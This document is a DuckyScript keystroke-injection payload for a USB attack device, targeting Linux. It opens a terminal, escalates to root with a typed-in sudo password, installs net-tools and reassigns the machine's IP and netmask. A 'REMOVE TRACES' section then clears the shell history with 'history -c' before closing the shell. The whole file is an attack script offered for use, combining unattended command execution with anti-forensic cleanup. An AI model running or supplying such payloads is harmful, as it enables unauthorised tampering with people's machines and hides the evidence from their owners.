
REM ###############################################
REM #                                             |
REM # Title        : Change Network Configuration |
REM # Author       : Aleff                        |
REM # Version      : 1.0                          |
REM # Category     : Execution                    |
REM # Target       : Linux                        |
REM #                                             |
REM ###############################################

REM Requirements:
REM     - Permissions

DELAY 1000
CTRL-ALT t
DELAY 2000


REM #### PERMISSIONS SECTION ####


REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER

DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000


REM #### IP SECTION ####


REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000

REM Set network interface
DEFINE IP 192.168.1.100
DEFINE MASK 255.255.255.0
DEFINE GATEWAY 192.168.1.1

STRING IP="
STRING IP
STRING "
ENTER
DELAY 500
STRING MASK="
STRING MASK
STRING "
ENTER
DELAY 500
STRING GATEWAY="
STRING GATEWAY
STRING "
ENTER
DELAY 500

REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE $IP netmask $MASK up
ENTER
DELAY 500


REM #### REMOVE TRACES ####


STRING history -c
ENTER
DELAY 500

REM Close shell
STRING exit
ENTER
